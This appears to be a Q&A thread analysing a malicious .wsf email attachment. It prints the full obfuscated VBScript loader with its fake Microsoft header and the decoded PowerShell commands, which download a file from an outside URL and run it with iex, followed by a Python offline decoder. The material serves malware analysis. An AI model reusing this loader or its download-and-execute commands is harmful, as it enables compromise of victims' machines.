Tags: vbscript, virus, trojan

Is this VB script potentially dangerous?


This morning I received an email containing, among other things, a file with the extension .wsf, on which I inadvertently clicked.

I immediately realized that I had made a mistake ... but too late :( Can you tell me if it is malicious code?

Here is the code:

<package><job id="zXGYF_83"><script language="VBScript">
' Version: 10.7.91
'
' Copyright (c) Microsoft Corporation. All rights reserved.
'
' Windows Software Licensing Management Tool.
'
' The header above is only decoration; nothing in this script touches Windows licensing.
' WScript.Shell is the COM object used below to run arbitrary commands.
Set ISUaUv=WScript.CreateObject("WScript.Shell")
' Obfuscated payload: two commands joined by the delimiter "dev", each one stored
' reversed with every character code shifted up by 4.
jpHg="&&wp|2vixrm`)exehtte)$wp|2vixrm3^694Q;4W4;WWPHJH3veqs3qsg2oveqlxm{qm33>wtxxl$GVwvpMHv$vijwrevx3$$rmqhewxmf*&&$g1$ppilwvi{stdev$$|im€$Qp($?krmvxW1xyS$€wp|2vixrm`)exehtte)$gkAQp($*$$g1$$ppilwvi{st"
arr=split(jpHg,"dev")
For Each nEZVNX In arr
KcSOUa=""
fInEJ=Len(nEZVNX) - 1
' Walk the chunk left to right, shift each character code down by 4 and prepend it;
' prepending reverses the chunk, which recovers the plaintext command.
For intI = 0 to fInEJ
KcSOUa=chr(Asc(Mid(nEZVNX,intI + 1 ,1 ))+0-4)+KcSOUa
Next
' Run(command, windowStyle, waitOnReturn): False coerces to window style 0 (hidden),
' -1 is True, so the script waits for each command before decoding and running the next.
ISUaUv.run KcSOUa,false,-1
Next

</script></job></package>

Thank you!


Solution

  • The fact it obfuscates itself is a good indicator it may be malicious; if you want to see what it's attempting to run you can:

    Comment out this line (like below):

    'ISUaUv.run KcSOUa,false,-1
    

    Add this line below it:

    WScript.Echo KcSOUa
    

    When you run the script you will get this output:

    Output:

    powershell -c ""&bitsadmin  /transfer rDIlrsRC https://imwithmark.com/omar/DFDLSS70S07M052Z/inter.xls %appdata%\inter.xls""
    powershell  -c  & $lM=gc %appdata%\inter.xls| Out-String; $lM |iex  
    

    Judging by the first line, the script is using the BITSAdmin service (built into Windows) to initiate a download from the remote URL into a local XLS file stored inside your user profile AppData folder. As for the second, I'm not clear on what that does but someone with more PowerShell knowledge will be able to shed light on it.


    Update

    It looks to be using gc (Get-Content applet in PowerShell) to pull the content of the file into a string using the Out-String command. It then pipes this to iex (Invoke-Expression command) to be executed.

    The likelihood is the inter.xls file that was downloaded contains malicious commands that are then being locally executed in the context of the local system. This is a classic script kiddie hack to get around remote code execution.
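The answer above recovers the commands by editing the .wsf and running it again under the Windows Script Host. A safer way to get the same result is to re-implement the decoding loop offline, so nothing from the sample is executed at all. The Python script below is an added example and is not part of the question or the answer; it reproduces the loader's transform (split on "dev", shift every character code down by 4, reverse each chunk) against the obfuscated string copied verbatim from the posted script, and then pulls the URL and the dropped file path out of the decoded commands. The IOC-extraction helper and its regular expressions are my own addition, not something the sample contains. One caveat the example handles explicitly: VBScript's Asc() returns the ANSI (Windows-1252) code of a character, not its Unicode code point, which is why the euro sign in the blob decodes to the pipe character that the PowerShell line needs; a decoder built on Python's ord() would get that character wrong.

```python
"""Offline decoder for the .wsf loader discussed above (added example, not the post's code).

The loader splits one string on the literal "dev", then for each chunk subtracts 4
from every character code and prepends the result, which reverses the chunk.
Reproducing that transform here recovers the commands without running anything.
"""
import re
from typing import Dict, List

# Obfuscated payload copied verbatim from the posted script (variable jpHg).
# The euro sign is written as \u20ac so this file needs no special source encoding.
OBFUSCATED = (
    "&&wp|2vixrm`)exehtte)$wp|2vixrm3^694Q;4W4;WWPHJH3veqs3qsg2oveqlxm{qm33>wtxxl"
    "$GVwvpMHv$vijwrevx3$$rmqhewxmf*&&$g1$ppilwvi{stdev$$|im\u20ac$Qp($?krmvxW1xyS"
    "$\u20acwp|2vixrm`)exehtte)$gkAQp($*$$g1$$ppilwvi{st"
)


def decode_chunk(chunk: str, shift: int = 4, codepage: str = "cp1252") -> str:
    """Undo the per-character shift and the reversal for one chunk.

    VBScript's Asc() yields the ANSI code (Windows-1252 on a Western-locale box),
    not the Unicode code point. '\u20ac' is 0x80 in cp1252, and 0x80 - 4 = 0x7C,
    the '|' that the PowerShell pipeline relies on. ord('\u20ac') would be 8364.
    """
    raw = chunk.encode(codepage)
    shifted = bytes((b - shift) % 256 for b in raw)
    return shifted[::-1].decode(codepage)


def decode_payload(blob: str, delimiter: str = "dev") -> List[str]:
    """Split the blob the way the loader does and decode every command in order."""
    return [decode_chunk(chunk) for chunk in blob.split(delimiter)]


# Hypothetical helper patterns for indicator extraction (my addition, not the sample's).
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
APPDATA_PATH_RE = re.compile(r"%appdata%\\[\w.]+", re.IGNORECASE)


def extract_iocs(commands: List[str]) -> Dict[str, List[str]]:
    """Collect remote URLs and %appdata% file paths from the decoded commands,
    keeping first-seen order and dropping duplicates."""
    urls: List[str] = []
    paths: List[str] = []
    for cmd in commands:
        urls.extend(URL_RE.findall(cmd))
        paths.extend(APPDATA_PATH_RE.findall(cmd))
    return {"urls": list(dict.fromkeys(urls)), "paths": list(dict.fromkeys(paths))}


if __name__ == "__main__":
    decoded = decode_payload(OBFUSCATED)
    for index, command in enumerate(decoded, 1):
        print(f"[{index}] {command}")
    print(extract_iocs(decoded))
```

Running it prints the same two commands the answer obtained, without the Windows Script Host ever seeing the file; the URL and the %appdata%\inter.xls path it returns are the indicators to block and to look for on the machine that opened the attachment.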